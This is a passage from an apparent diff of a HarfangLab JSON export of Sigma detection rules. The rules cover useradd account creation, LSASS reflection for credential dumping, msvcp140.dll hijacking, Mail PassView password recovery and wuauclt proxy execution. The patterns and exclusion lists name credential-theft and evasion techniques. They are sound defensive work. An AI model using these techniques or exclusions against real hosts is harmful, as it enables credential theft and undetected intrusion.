+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.612534Z",
+ "rule_level": "low",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/",
+ "https://attack.mitre.org/techniques/T1136/001/"
+ ],
+ "name": "t1136_001_useradd_linux.yml",
+ "content": "title: User Created via useradd\nid: 00ecf213-801a-4ee0-b19d-fbe12001d4a3\ndescription: |\n Detects an attempt to create a new user using the useradd utility.\n Adversaries may create new users to hide their activity or achieve persistence.\n It is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\nreferences:\n - https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/useradd'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessCommandLine: 'useradd -r -g nxlog -d /var/spool/nxlog -s /sbin/nologin -c user for the nxlog log managment tool nxlog'\n\n exclusion_ossec:\n ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_aws:\n ProcessCommandLine: '/bin/bash /var/lib/cloud/instance/scripts/part-001'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_edutice:\n # useradd -p -s /bin/bash -b /home/external -g edutice-external -m --badname\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessGrandparentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/podman'\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3",
+ "rule_name": "User Created via useradd",
+ "rule_description": "Detects an attempt to create a new user using the useradd utility.\nAdversaries may create new users to hide their activity or achieve persistence.\nIt is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\n",
+ "rule_creation_date": "2023-01-03",
+ "rule_modified_date": "2026-03-23",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1136.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "00ff5814-36a0-4bb9-8426-599b30b414a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.094659Z",
+ "creation_date": "2026-03-23T11:45:34.094661Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.094665Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/deepinstinct/Dirty-Vanity",
+ "https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c",
+ "https://attack.mitre.org/techniques/T1055/"
+ ],
+ "name": "t1003_001_lsass_clone_using_process_reflection.yml",
+ "content": "title: Possible LSASS Reflection via Windows Fork API\nid: 00ff5814-36a0-4bb9-8426-599b30b414a1\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "00ff5814-36a0-4bb9-8426-599b30b414a1",
+ "rule_name": "Possible LSASS Reflection via Windows Fork API",
+ "rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to investigate the process that performed this action to determine its legitimacy.\n",
+ "rule_creation_date": "2023-01-04",
+ "rule_modified_date": "2025-01-31",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1003.001",
+ "attack.t1055"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "01198d94-cc61-455c-9bd1-37096dd366f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.623301Z",
+ "creation_date": "2026-03-23T11:45:34.623303Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.623307Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
+ "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_unsigned_msvcp140.yml",
+ "content": "title: Unsigned msvcp140.dll DLL Loaded\nid: 01198d94-cc61-455c-9bd1-37096dd366f1\ndescription: |\n Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\msvcp140.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n\n filter_commonfolders:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\msvcp140.dll'\n - '?:\\Windows\\syswow64\\msvcp140.dll'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_known_sha256:\n sha256:\n - '1e57a6df9e3742e31a1c6d9bff81ebeeae8a7de3b45a26e5079d5e1cce54cd98'\n - 'f7ba518cb961853ec35c7bb159054983fc006fdfbb6b1c360720eb52fefb3d38'\n - 'b7278da3da769bff80ecf19d0f36ad1716da7f6c77f625c08d185ad302b200d0'\n - 'ef27a68bdc1ee3d5d9a6a720b656bfb7604a8fac6aceb245a6eadc2788686d9f'\n - '557d76338488e28c7761dfe5ee4fa722f65f0c945563002e86de09c95f02b2aa'\n - '75fc76655631a4ae72d015b8e85f899537c603661ca35a3f29099b8e4c84716c'\n - '74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823'\n - '87a9e61e428632177c0292390d125da8e5c996cc0d1d619045ee041ce3bd9147'\n - '9e16ea4679e3c5780b2fdeea251e258bef968631137a40f93fcad6ee551108df'\n - 'd3151f653af88d88994dd66e30e3a184ba347e57a7c3ca909c2a9d4b5b6084fc'\n - '875f236424f59a82c9311930097c7e6073242fee66a60c38eec79b827d6e924c'\n - '006a73b6c5b31cc85974873a694e81e3d213ec493323b04607bcdaba0d6115eb'\n - '85aa8c8ab4cbf1ff9ae5c7bde1bf6da2e18a570e36e2d870b88536b8658c5ba8'\n - '115327d2c7fe87aa39a32bf3fd27e3cff32b9f4bb80f31e426b30148820aa220'\n - 'b9e8377a03ef104122a416f968b05133739f2f2a6c4b83c190723d7d780ebad3'\n - 'c09b126e7d4c1e6efb3ffcda2358252ce37383572c78e56ca97497a7f7c793e4'\n - '65ee0e7864cc6b2d8fd81b4cdf32bc900b74fdf04149587a8987f11f57966c86'\n - 'e7f59bc871613f960e61aa111ceb2f6de0650f79878d9e2141c646a51bdf97b0'\n - '8bd47bbc5cf773fa44ba38a20dbd3353970353cb99eda9238e4af92383fab8f9'\n\n filter_knownimphash:\n Imphash:\n - '2ba11fd5a511c8a409e705e9ab6b5dc1'\n - 'adf99b9ea3a1f76c33522f96772bc4dd'\n - 'a14a54183892ac75415d5e2bb2ac7208'\n - '01c801a34c4715440ef1f25ad689b315'\n - '54c174302c3213f3e59e692f8b5c58e5'\n - 'f2d585ff96afa3a77e09f5b37e7b3230'\n - 'c0e775d13a8146396b3de4dc441694a7'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_spool:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\msvcp140.dll'\n\n exclusion_java: # too many java process with unpredictable name..\n ImageLoaded|endswith: '\\bin\\msvcp140.dll'\n\n exclusion_zotero:\n ProcessImage|endswith: '\\Zotero*\\zotero.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Zotero\\msvcp140.dll'\n\n exclusion_ideashare:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShare.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShareService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\IdeaShareService.exe'\n - '?:\\ProgramData\\IdeaShare\\IdeaShare.exe'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\msvcp140.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\msvcp140.dll'\n - '?:\\ProgramData\\IdeaShare\\msvcp140.dll'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_teams:\n - ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\msvcp140.dll'\n - ProcessName: 'regsvr32.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\\\*\\\\*\\msvcp140.dll'\n\n exclusion_onedrive:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\Microsoft.SharePoint.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileSyncConfig.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileCoAuth.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\OneDriveLauncher.exe'\n\n exclusion_sap:\n ProcessImage|endswith: '\\DATA_UNITS\\CrystalReports\\setup.engine\\actionagentproc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_sonix:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k Camera -s FrameServer'\n ImageLoaded: '?:\\Windows\\System32\\SONiX\\msvcp140.dll'\n\n exclusion_cisco:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\wmlhost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "01198d94-cc61-455c-9bd1-37096dd366f1",
+ "rule_name": "Unsigned msvcp140.dll DLL Loaded",
+ "rule_description": "Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\n",
+ "rule_creation_date": "2024-07-23",
+ "rule_modified_date": "2026-02-10",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "01474426-6a8b-4834-9f6f-54b7c359a027",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.077917Z",
+ "creation_date": "2026-03-23T11:45:34.077919Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.077924Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.nirsoft.net/utils/mailpv.html",
+ "https://attack.mitre.org/techniques/T1555/"
+ ],
+ "name": "t1555_mail_passview_execution.yml",
+ "content": "title: Mail PassView Execution\nid: 01474426-6a8b-4834-9f6f-54b7c359a027\ndescription: |\n Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\n It can be used by attackers to get the mail passwords in an infected hosts.\n It is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\nreferences:\n - https://www.nirsoft.net/utils/mailpv.html\n - https://attack.mitre.org/techniques/T1555/\ndate: 2025/10/31\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.MailPassView\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\mailpv.exe'\n # No OrginalFilename, we have to rely on another PE field\n # The two spaces are intentional\n - Product: 'Email Password-Recovery'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "01474426-6a8b-4834-9f6f-54b7c359a027",
+ "rule_name": "Mail PassView Execution",
+ "rule_description": "Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\nIt can be used by attackers to get the mail passwords in an infected hosts.\nIt is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\n",
+ "rule_creation_date": "2025-10-31",
+ "rule_modified_date": "2025-11-04",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1555"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "016b5935-600b-4242-91e1-e727c9410d11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.070359Z",
+ "creation_date": "2026-03-23T11:45:34.070361Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.070365Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/",
+ "https://attack.mitre.org/techniques/T1218/"
+ ],
+ "name": "t1218_wuauctl.yml",
+ "content": "title: Proxy Execution via Wuauclt\nid: 016b5935-600b-4242-91e1-e727c9410d11\ndescription: |\n Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\n Malicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\n It is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/11/17\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'UpdateDeploymentProvider'\n - 'RunHandlerComServer'\n\n exclusion_legitimate:\n CommandLine|contains:\n - ' UpdateDeploymentProvider.dll '\n - ' wuaueng.dll '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "016b5935-600b-4242-91e1-e727c9410d11",
+ "rule_name": "Proxy Execution via Wuauclt",
+ "rule_description": "Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\nMalicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\nIt is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\n",
+ "rule_creation_date": "2022-11-17",
+ "rule_modified_date": "2025-02-20",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1218"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "01833e69-127a-4ff4-a998-d4decbae548f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.069505Z",
+ "creation_date": "2026-03-23T11:45:34.069507Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.069512Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1112/"
+ ],
+ "name": "t1112_hidden_registry_data_space.yml",
